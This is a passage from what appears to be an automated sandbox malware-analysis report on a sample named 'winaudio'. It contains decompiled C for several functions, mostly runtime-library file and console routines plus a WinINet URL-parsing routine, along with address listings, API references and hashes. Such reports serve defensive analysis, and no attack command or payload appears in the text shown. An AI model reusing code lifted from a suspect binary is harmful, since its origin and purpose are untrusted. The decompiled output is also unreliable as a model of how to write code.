                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00392577,?,00000000,00000000,00000000,00000000,0000000C), ref: 00391E44
                        • __fassign.LIBCMT ref: 00391EBF
                        • __fassign.LIBCMT ref: 00391EDA
                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00391F00
                        • WriteFile.KERNEL32(?,00000000,00000000,w%9,00000000,?,?,?,?,?,?,?,?,?,00392577,?), ref: 00391F1F
                        • WriteFile.KERNEL32(?,?,00000001,w%9,00000000,?,?,?,?,?,?,?,?,?,00392577,?), ref: 00391F58
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                        • String ID: w%9
                        • API String ID: 1324828854-420085544
                        • Opcode ID: 284492be42652b431ef8e61d16aa8ef2366623f064e78dd02739179080110c68
                        • Instruction ID: b8bfb6753563b37b70eda5931476cc331b582c536f55fed81d5ddb6c3e490c31
                        • Opcode Fuzzy Hash: 284492be42652b431ef8e61d16aa8ef2366623f064e78dd02739179080110c68
                        • Instruction Fuzzy Hash: 01519075E0024AAFDF12CFA9DC85AEEBBB8EF08300F14455AE956F7251E7709941CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038C659 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E0038C659(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E00380E8B();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E00380E9E())) = 9;
						L59:
						_t145 = E0037F971();
						goto L60;
					}
					__eflags = _t213 -  *0x3f0490; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x3f0290 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E0038B939(_t224, _t158);
								E0038B8FF(0);
								E0038B8FF(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E0038C043(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x3f0290 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x3f0290 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x3f0290 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x3f0290 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x3f0290 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x3f0290 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x3f0290 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E0039315C(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E00380E68(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E00380E9E())) = 9;
											 *(E00380E8B()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x3f0290 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E0038C1B5();
												} else {
													_t176 = E0038C4C5();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E0038C375(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t104 =  &_v28; // 0xa
									_t231 =  *_t104;
									_t178 =  *((intOrPtr*)(0x3f0290 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E00380E9E())) = 0xc;
									 *(E00380E8B()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E0038B8FF(_t246);
									return _t242;
								}
							}
							L15:
							 *(E00380E8B()) =  *_t206 & _t246;
							 *((intOrPtr*)(E00380E9E())) = 0x16;
							E0037F971();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E00380E8B()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E00380E9E())) = 0x16;
					goto L59;
				} else {
					 *(E00380E8B()) =  *_t212 & 0x00000000;
					_t145 = E00380E9E();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































                        0x0038c662
                        0x0038c669
                        0x0038c683
                        0x0038c685
                        0x0038c9ed
                        0x0038c9ed
                        0x0038c9f2
                        0x0038c9f2
                        0x0038c9fa
                        0x0038ca00
                        0x0038ca00
                        0x00000000
                        0x0038ca00
                        0x0038c68b
                        0x0038c691
                        0x00000000
                        0x00000000
                        0x0038c699
                        0x0038c6a5
                        0x0038c6a8
                        0x0038c6ab
                        0x0038c6ae
                        0x0038c6b5
                        0x0038c6b8
                        0x0038c6bc
                        0x0038c6bf
                        0x0038c6c2
                        0x00000000
                        0x00000000
                        0x0038c6c8
                        0x0038c6cb
                        0x0038c6d1
                        0x0038c6eb
                        0x0038c6ed
                        0x0038c9e9
                        0x00000000
                        0x0038c9e9
                        0x0038c6f3
                        0x0038c6f7
                        0x00000000
                        0x00000000
                        0x0038c6fd
                        0x0038c701
                        0x00000000
                        0x00000000
                        0x0038c708
                        0x0038c70c
                        0x0038c70f
                        0x0038c712
                        0x0038c717
                        0x0038c717
                        0x0038c71a
                        0x0038c737
                        0x0038c73c
                        0x0038c73e
                        0x0038c740
                        0x0038c760
                        0x0038c761
                        0x0038c763
                        0x0038c766
                        0x0038c768
                        0x0038c76a
                        0x0038c76c
                        0x0038c76c
                        0x0038c777
                        0x0038c779
                        0x0038c780
                        0x0038c785
                        0x0038c788
                        0x0038c78b
                        0x0038c78d
                        0x0038c7b2
                        0x0038c7b7
                        0x0038c7be
                        0x0038c7c1
                        0x0038c7c4
                        0x0038c7c8
                        0x0038c7ca
                        0x0038c7ce
                        0x0038c7d0
                        0x0038c7d3
                        0x0038c7d6
                        0x0038c7d8
                        0x0038c7db
                        0x0038c7e2
                        0x0038c7e5
                        0x0038c7ea
                        0x0038c7ed
                        0x0038c7f6
                        0x0038c7fa
                        0x0038c7fd
                        0x0038c800
                        0x0038c803
                        0x0038c809
                        0x0038c80b
                        0x0038c814
                        0x0038c817
                        0x0038c81a
                        0x0038c81d
                        0x0038c81e
                        0x0038c822
                        0x0038c828
                        0x0038c832
                        0x0038c837
                        0x0038c847
                        0x0038c84b
                        0x0038c84e
                        0x0038c850
                        0x0038c852
                        0x0038c854
                        0x0038c856
                        0x0038c85e
                        0x0038c85f
                        0x0038c862
                        0x0038c865
                        0x0038c866
                        0x0038c86c
                        0x0038c876
                        0x0038c87e
                        0x0038c881
                        0x0038c88d
                        0x0038c891
                        0x0038c894
                        0x0038c896
                        0x0038c898
                        0x0038c89a
                        0x0038c89c
                        0x0038c8a4
                        0x0038c8a5
                        0x0038c8a8
                        0x0038c8ab
                        0x0038c8ab
                        0x0038c8ac
                        0x0038c8b2
                        0x0038c8bc
                        0x0038c8bc
                        0x0038c89a
                        0x0038c896
                        0x0038c881
                        0x0038c854
                        0x0038c850
                        0x0038c837
                        0x0038c80b
                        0x0038c803
                        0x0038c8c2
                        0x0038c8c8
                        0x0038c8ca
                        0x0038c93d
                        0x0038c93d
                        0x0038c941
                        0x0038c951
                        0x0038c957
                        0x0038c959
                        0x0038c9b5
                        0x0038c9b5
                        0x0038c9bd
                        0x0038c9be
                        0x0038c9c0
                        0x0038c9d9
                        0x0038c9dc
                        0x0038c919
                        0x0038c91a
                        0x00000000
                        0x0038c91f
                        0x0038c9e2
                        0x00000000
                        0x0038c9e2
                        0x0038c9c7
                        0x0038c9d2
                        0x00000000
                        0x0038c9d2
                        0x0038c95b
                        0x0038c95e
                        0x0038c961
                        0x00000000
                        0x00000000
                        0x0038c963
                        0x0038c963
                        0x0038c966
                        0x0038c969
                        0x0038c96c
                        0x0038c973
                        0x0038c978
                        0x0038c97a
                        0x0038c97e
                        0x0038c999
                        0x0038c99d
                        0x0038c99e
                        0x0038c9a1
                        0x0038c9a2
                        0x0038c9ae
                        0x0038c9a4
                        0x0038c9a4
                        0x0038c9a4
                        0x0038c980
                        0x0038c980
                        0x0038c980
                        0x0038c98b
                        0x0038c990
                        0x0038c993
                        0x0038c993
                        0x00000000
                        0x0038c978
                        0x0038c8cf
                        0x0038c8cf
                        0x0038c8d2
                        0x0038c8d9
                        0x0038c8de
                        0x00000000
                        0x00000000
                        0x0038c8e7
                        0x0038c8ed
                        0x0038c8ef
                        0x00000000
                        0x00000000
                        0x0038c8f1
                        0x0038c8f5
                        0x00000000
                        0x00000000
                        0x0038c909
                        0x0038c90f
                        0x0038c911
                        0x0038c935
                        0x0038c938
                        0x00000000
                        0x0038c938
                        0x0038c913
                        0x00000000
                        0x0038c78f
                        0x0038c794
                        0x0038c79f
                        0x0038c920
                        0x0038c920
                        0x0038c920
                        0x0038c923
                        0x0038c924
                        0x00000000
                        0x0038c92c
                        0x0038c78d
                        0x0038c742
                        0x0038c747
                        0x0038c74e
                        0x0038c754
                        0x00000000
                        0x0038c754
                        0x0038c71c
                        0x0038c71f
                        0x0038c729
                        0x0038c729
                        0x0038c72c
                        0x0038c72f
                        0x00000000
                        0x0038c72f
                        0x0038c723
                        0x0038c725
                        0x0038c727
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0038c727
                        0x0038c6d3
                        0x0038c6d8
                        0x0038c6e0
                        0x00000000
                        0x0038c66b
                        0x0038c670
                        0x0038c673
                        0x0038c678
                        0x0038ca05
                        0x00000000
                        0x0038ca05

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID: 0-3907804496
                        • Opcode ID: c89400c64b8c8c627c63bc4f51f4fcab86262d2deeb2f3ec1dff5f115fc394ea
                        • Instruction ID: 72a28a1f5cc2b376d8532d5109bebd122b93c5a7677a663911d5cf9394c7d402
                        • Opcode Fuzzy Hash: c89400c64b8c8c627c63bc4f51f4fcab86262d2deeb2f3ec1dff5f115fc394ea
                        • Instruction Fuzzy Hash: 7BC1D071914349AFDB17EFA8C881BADBBB8BF0A300F1954D9E544AB392C7749941CB70
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D9390 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 163networkCOMMON
                        Download Yara Rule
                        C-Code - Quality: 80%
                        			E002D9390(void* __ebx, char* __ecx, intOrPtr* __edx, void* __edi, short* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v2092;
				char _v4180;
				char _v6268;
				long _v6272;
				signed int _v6276;
				intOrPtr* _v6280;
				signed int _v6284;
				short* _v6288;
				intOrPtr _v6292;
				intOrPtr _v6304;
				intOrPtr* _v6308;
				short _v6328;
				intOrPtr _v6332;
				intOrPtr* _v6336;
				intOrPtr _v6340;
				void* _v6352;
				void* __esi;
				signed int _t47;
				char* _t59;
				signed int _t62;
				signed int _t65;
				signed int _t67;
				long _t75;
				char* _t78;
				char* _t79;
				void* _t82;
				intOrPtr* _t88;
				signed int _t89;
				intOrPtr* _t91;
				signed int _t92;
				intOrPtr* _t103;
				intOrPtr* _t104;
				char* _t106;
				void* _t110;
				char* _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t116;
				signed int _t117;
				void* _t118;
				void* _t119;

				_t102 = __edx;
				_t82 = __ebx;
				E00397C10();
				_t47 =  *0x3e1008; // 0x847b54ee
				_v8 = _t47 ^ _t117;
				_push(_t110);
				_v6288 = _a4;
				_t106 = __ecx;
				_v6292 = _a8;
				_v6280 = __edx;
				_v6272 = 0x824;
				_v6276 = 0;
				E0037E1A0(__ecx,  &_v4180, 0, 0x825);
				E0037E1A0(_t106,  &_v6268, 0, 0x825);
				E0037E1A0(_t106,  &_v6352, 0, 0x3c);
				_v6352 = 0x3c;
				_v6336 =  &_v4180;
				_t119 = _t118 + 0x24;
				_v6332 = 0x824;
				_v6304 = 0x824;
				_v6308 =  &_v6268;
				if(_t106[0x14] < 0x10) {
					_t59 = _t106;
				} else {
					_t59 =  *_t106;
				}
				if(InternetCanonicalizeUrlA(_t59,  &_v2092,  &_v6272, 0x2000000) != 0) {
					_t111 =  &_v2092;
					goto L12;
				} else {
					_t75 = GetLastError();
					_t124 = _t75 - 0x7a;
					if(_t75 != 0x7a) {
						L10:
						_pop(_t116);
						return E002E056D(_v8 ^ _t117, _t102, _t116);
					} else {
						_push(_v6272);
						_t78 = E002E0A70(_t102, _t110, _t124);
						_t119 = _t119 + 4;
						_v6276 = 1;
						_t111 = _t78;
						if(_t106[0x14] < 0x10) {
							_t79 = _t106;
						} else {
							_t79 =  *_t106;
						}
						if(InternetCanonicalizeUrlA(_t79, _t111,  &_v6272, 0x2000000) != 0) {
							L12:
							_t62 = InternetCrackUrlA(_t111, 0, 0,  &_v6352);
							__eflags = _v6276;
							_v6284 = _t62;
							if(_v6276 != 0) {
								L002E086C(_t111);
								_t62 = _v6284;
							}
							__eflags = _t62;
							if(_t62 != 0) {
								_t103 = _v6336;
								 *_v6288 = _v6328;
								 *_v6280 = _v6340;
								__eflags =  *_t103;
								if( *_t103 != 0) {
									_t88 = _t103;
									_t112 = _t88 + 1;
									do {
										_t65 =  *_t88;
										_t88 = _t88 + 1;
										__eflags = _t65;
									} while (_t65 != 0);
									_t89 = _t88 - _t112;
									__eflags = _t89;
								} else {
									_t89 = 0;
								}
								_push(_t89);
								E002D0860(_t82, _t106, _t103);
								_t104 = _v6308;
								__eflags =  *_t104;
								if( *_t104 != 0) {
									_t91 = _t104;
									_t113 = _t91 + 1;
									do {
										_t67 =  *_t91;
										_t91 = _t91 + 1;
										__eflags = _t67;
									} while (_t67 != 0);
									_t92 = _t91 - _t113;
									__eflags = _t92;
								} else {
									_t92 = 0;
								}
								E002D0860(_t82, _v6292, _t104);
								__eflags = _v8 ^ _t117;
								_t114 = _t92;
								return E002E056D(_v8 ^ _t117, _t104, _t114);
							} else {
								GetLastError();
								_pop(_t115);
								 *_v6280 = 4;
								__eflags = _v8 ^ _t117;
								return E002E056D(_v8 ^ _t117, _t102, _t115);
							}
						} else {
							L002E086C(_t111);
							goto L10;
						}
					}
				}
			}















































                        0x002d9390
                        0x002d9390
                        0x002d9398
                        0x002d939d
                        0x002d93a4
                        0x002d93aa
                        0x002d93ac
                        0x002d93b2
                        0x002d93bc
                        0x002d93cb
                        0x002d93d1
                        0x002d93db
                        0x002d93e5
                        0x002d93f8
                        0x002d9408
                        0x002d9413
                        0x002d941d
                        0x002d9423
                        0x002d9430
                        0x002d943a
                        0x002d9444
                        0x002d944a
                        0x002d9450
                        0x002d944c
                        0x002d944c
                        0x002d944c
                        0x002d946e
                        0x002d94d4
                        0x00000000
                        0x002d9470
                        0x002d9470
                        0x002d9476
                        0x002d9479
                        0x002d94c2
                        0x002d94c5
                        0x002d94d3
                        0x002d947b
                        0x002d947b
                        0x002d9481
                        0x002d9486
                        0x002d9489
                        0x002d9497
                        0x002d9499
                        0x002d949f
                        0x002d949b
                        0x002d949b
                        0x002d949b
                        0x002d94b7
                        0x002d94da
                        0x002d94e6
                        0x002d94ec
                        0x002d94f3
                        0x002d94f9
                        0x002d94fc
                        0x002d9501
                        0x002d9507
                        0x002d950a
                        0x002d950c
                        0x002d9543
                        0x002d9549
                        0x002d9558
                        0x002d955a
                        0x002d955d
                        0x002d9563
                        0x002d9565
                        0x002d9568
                        0x002d9568
                        0x002d956a
                        0x002d956b
                        0x002d956b
                        0x002d956f
                        0x002d956f
                        0x002d955f
                        0x002d955f
                        0x002d955f
                        0x002d9571
                        0x002d9575
                        0x002d957a
                        0x002d9580
                        0x002d9583
                        0x002d9589
                        0x002d958b
                        0x002d9590
                        0x002d9590
                        0x002d9592
                        0x002d9593
                        0x002d9593
                        0x002d9597
                        0x002d9597
                        0x002d9585
                        0x002d9585
                        0x002d9585
                        0x002d95a1
                        0x002d95af
                        0x002d95b2
                        0x002d95bb
                        0x002d950e
                        0x002d950e
                        0x002d9521
                        0x002d9522
                        0x002d952b
                        0x002d9535
                        0x002d9535
                        0x002d94b9
                        0x002d94ba
                        0x00000000
                        0x002d94bf
                        0x002d94b7
                        0x002d9479

                        APIs
                        • InternetCanonicalizeUrlA.WININET(?,?,?,02000000), ref: 002D9466
                        • GetLastError.KERNEL32(?,?,?,02000000), ref: 002D9470
                        • InternetCanonicalizeUrlA.WININET(?,00000000,?,02000000), ref: 002D94AF
                        • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 002D94E6
                        • GetLastError.KERNEL32(?,?,?,02000000), ref: 002D950E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Internet$CanonicalizeErrorLast$Crack
                        • String ID: <
                        • API String ID: 404799558-4251816714
                        • Opcode ID: b17ad855b133b3c0edeee42ddfc075691c41ef447dd3f4bc570a92a7800f6df8
                        • Instruction ID: b3a8fff41f72ef5f514362696625f9f1c94e25002999207cdd6a38fcb2f6eb26
                        • Opcode Fuzzy Hash: b17ad855b133b3c0edeee42ddfc075691c41ef447dd3f4bc570a92a7800f6df8
                        • Instruction Fuzzy Hash: B7517D74A101199AEB25DF64DC45BE9B7F8AB05300F8080DAF409A7281DF719F95CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00383E27 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00383DD8,00000003,?,00383D78,00000003,003DF610,0000000C,00383ECF,00000003,00000002), ref: 00383E47
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00383E5A
                        • FreeLibrary.KERNEL32(00000000,?,?,?,00383DD8,00000003,?,00383D78,00000003,003DF610,0000000C,00383ECF,00000003,00000002,00000000), ref: 00383E7D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll$"-
                        • API String ID: 4061214504-1944269139
                        • Opcode ID: 38e2635c58fd0cb2cfdae3cb58a9f40e80353af48dcd515fb454e03bffa57c03
                        • Instruction ID: 43c59daea15baf359d455322e5296bf773d274ff00b1972a496a0748d8ed073b
                        • Opcode Fuzzy Hash: 38e2635c58fd0cb2cfdae3cb58a9f40e80353af48dcd515fb454e03bffa57c03
                        • Instruction Fuzzy Hash: CFF06831A00218BBDB12DFA5DC09B9EBFB8FF04B11F4101A9F805A6290CB715E90CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0038F40D Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 69%
                        			E0038F40D(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				void* _t103;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x3e1008; // 0x847b54ee
				_v8 = _t49 ^ _t105;
				_t102 = _a20;
				if(_t102 > 0) {
					_t78 = E00395392(_a16, _t102);
					_t109 = _t78 - _t102;
					_t4 = _t78 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t78;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t103);
					return E002E056D(_v8 ^ _t105, _t95, _t103);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t104 = 0;
							L37:
							E003839E9(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t81, _v12);
						_t120 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t99 = _v12;
